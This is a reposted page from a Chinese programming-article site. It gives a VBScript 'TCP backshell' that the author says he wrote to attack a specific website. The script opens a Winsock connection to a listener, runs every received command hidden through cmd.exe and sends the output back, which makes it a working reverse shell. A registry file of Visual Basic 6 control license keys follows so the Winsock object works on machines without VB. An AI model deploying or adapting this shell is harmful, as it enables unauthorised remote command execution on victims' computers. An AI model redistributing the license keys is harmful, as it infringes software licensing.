欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

TCP版backshell的VBS脚本代码

程序员文章站 2022-03-21 11:05:55
'搞一个特殊的站准备用的,没想到,等写完了,洞补上了,郁闷 'by 009, baicker@hotmail.com 'date:071221 dim&...
'搞一个特殊的站准备用的,没想到,等写完了,洞补上了,郁闷
'by 009, baicker@hotmail.com
'date:071221

dim revdata
set sock=wscript.createobject( "mswinsock.winsock" , "wsevent_" )
set sc=createobject( "wscript.shell" )
set fso =createobject( "scripting.filesystemobject" )
sock.connect "127.0.0.1" , 1234

sub wsevent_connect()
wscript.echo "connected!"
end sub

sub wsevent_dataarrival(bytes)
mystring= "blank" 
sock.getdata mystring
revdata=mystring
if bytes> 0 then
if instr(revdata, "exit" )> 0 then
sock.close
sock.close
sock= nothing
bclose= true
exit sub
else
on error resume next
tempfile= "c:\" & fso.gettempname
cmd=left(revdata,len(revdata)- 1 )
call sc.run ( "cmd.exe /c " & cmd & " > " & tempfile, 0 , true )
set txf = fso.opentextfile(tempfile, 1 , false , 0 )
sock.senddata txf.readall & vbcrlf & vbcrlf
txf.close
call fso.deletefile(tempfile, true )
end if
sock.senddata "009>"
end if
end sub

while not bclose
wscript.sleep 1
wend

—————————————————————————————————————
调用winsock,未装vb的需要导入注册表
—————————————— vb6controls.reg —————————————————-
regedit
hkey_classes_root\licenses = licensing: copying the keys may be a violation of established copyrights.

// masked edit control 6.0 license key
hkey_classes_root\licenses\bc96f860-9928-11cf-8afa-00aa00c00905 = mmimfflflmqmlfffrlnmofhfkgrlmmfmqkqj

// chart control 6.0 (oledb) license key
hkey_classes_root\licenses\12b142a4-bd51-11d1-8c08-0000f8754da1 = aadhgafabafajhchnbchehfambfbbachmfmb

// common dialog control 6.0 license key
hkey_classes_root\licenses\4d553650-6abe-11cf-8adb-00aa00c00905 = gfjmrfkfifkmkfffrlmmgmhmnlulkmfmqkqj

// ado data control 6.0 (oledb) license key
hkey_classes_root\licenses\c4145310-469c-11d1-b182-00a0c922e820 = konhqhioohihphkouimonhqhvnwiqhhhnjti

// common controls-3 6.0 license key
hkey_classes_root\licenses\38911da0-e448-11d0-84a3-00dd01104159 = mcpckchcdchjcjcclidcgcgchdqdcjhcojpd

// windows common controls-2 5.0 (sp2) license key
hkey_classes_root\licenses\9e799bf1-8817-11cf-958f-0020afc28c3b = uqpqnqkjujkjjjjqwktjrjkjtkupsjnjtoun

// windows common controls license key
hkey_classes_root\licenses\57cbf9e0-6aa7-11cf-8adb-00aa00c00905 = aahakhchghkhfhaamghhbhbhkbpgfhahlfle

// data bound grid control 5.0(sp3) license key
hkey_classes_root\licenses\556c75f1-efbc-11cf-b9f3-00a0247033c4 = xybiedobrqsprbijaegcbislrsiucfjdhisl

// data bound list controls 6.0 license key
hkey_classes_root\licenses\096efc40-6abf-11cf-850c-08002b30345d = knsgigmnmngnmnigthmgpninrmumhgkgrlrk

// internet transfer control 6.0 license key
hkey_classes_root\licenses\78e1bdd1-9941-11cf-9756-00aa00c00908 = yjrjvqkjlqqjnqkjvprqsjnjvkuknjpjtoun

// multimedia control 6.0 license key
hkey_classes_root\licenses\b1efccf0-6ac1-11cf-8adb-00aa00c00905 = qqkjvqpqmqjjpqjjvpqqkqmqvkypoqjquoun

// chart control 6.0 license key
hkey_classes_root\licenses\7c35ca30-d112-11cf-8e72-00a0c90f26f8 = whmhmhohmhiorhkouimhihihwiwinhlosmsl

// windows common controls-2 6.0 license key
hkey_classes_root\licenses\4f86badf-9f77-11d1-b1b7-0000f8753f5d = iplpwpnippopupiivjrioppisjsjlpiiokuj

// windows common controls 6.0 license key
hkey_classes_root\licenses\ed4b87c4-9f76-11d1-8bf7-0000f8754da1 = knlggnmntgggrninthpgmnngrhqhnnjnslsh

// comm control 6.0 license key
hkey_classes_root\licenses\4250e830-6ac2-11cf-8adb-00aa00c00905 = kjljvjjjoquqmjjjvpqqkqmqykypoqjquoun

// datagrid control 6.0 (oledb) license key
hkey_classes_root\licenses\cde57a55-8b86-11d0-b3c6-00a0c90aea82 = ekpkhddkjkekpdjkqemkfkldoeoefkfdjfqe

// datalist control 6.0 (oledb) license key
hkey_classes_root\licenses\a133f000-ccb0-11d0-a316-00aa00688b10 = cibbcimbpihbbbbbnhdbeidiocmcbbdbgdoc

// dbwin license key
hkey_classes_root\licenses\d015b071-d2ed-11d0-a31a-00aa00688b10 = gjdcfjpcmjicjcdcoihcechjlioiccechepd

// msdbrpt license key
hkey_classes_root\licenses\9df1a470-ba8e-11d0-849c-00a0c90dc8a9 = cchcqjejhcgcqcfjpdfcdjkckiqikchcojpd

// flexgrid control 6.0 license key
hkey_classes_root\licenses\72e67120-5959-11cf-91f6-c2863c385e30 = ibcbbbebqbdbciebmcobmbhifcmciibblgmf

// mapi controls 6.0 license key
hkey_classes_root\licenses\899b3e80-6ac6-11cf-8adb-00aa00c00905 = wjsjjjlqmjpjrjjjvpqqkqmqukypoqjquoun

// msrdo 2.0 license key
hkey_classes_root\licenses\b1692f60-23b0-11d0-8e95-00a0c90f26f8 = mjjjccncgjijrcfjpdfjfcejpdkdkcgjojpd

// remotedata control 6.0 license key
hkey_classes_root\licenses\43478d75-78e0-11cf-8e78-00a0d100038e = imshohohphlmnhimuinmphmmuiminhlmsmsl

// windowless controls 6.0 license key
hkey_classes_root\licenses\80e80ef0-dbbe-11d0-bce2-00a0c90dca10 = qijimitpmpnpxplpvjnikpkpqoxjmpkpoivj

// pictureclip control 6.0 license key
hkey_classes_root\licenses\6fb38640-6ac7-11cf-8adb-00aa00c00905 = gdjkokgdldikhdddpjkkekgknesjikdkoioh

// rich textbox control 6.0 license key
hkey_classes_root\licenses\dc4d7920-6ac8-11cf-8adb-00aa00c00905 = iokouhloohrojhhhtnooiokomiwnmohosmsl

// sheridan tab control license key
hkey_classes_root\licenses\190b7910-992a-11cf-8afa-00aa00c00905 = gclclcejjcmjdcccoikjlcecoioijjcjnhng

// sysinfo control 6.0 license key
hkey_classes_root\licenses\e32e2733-1bc5-11d0-b8c3-00a0c90dca10 = kmhfimlflmmfpffmsgfmhmimngtghmoflhsg

// winsock control 6.0 license key
hkey_classes_root\licenses\2c49f800-c2dd-11cf-9ad6-0080c7e7b78d = mlrljgrlhltlngjlthrligklpkrhllglqlrk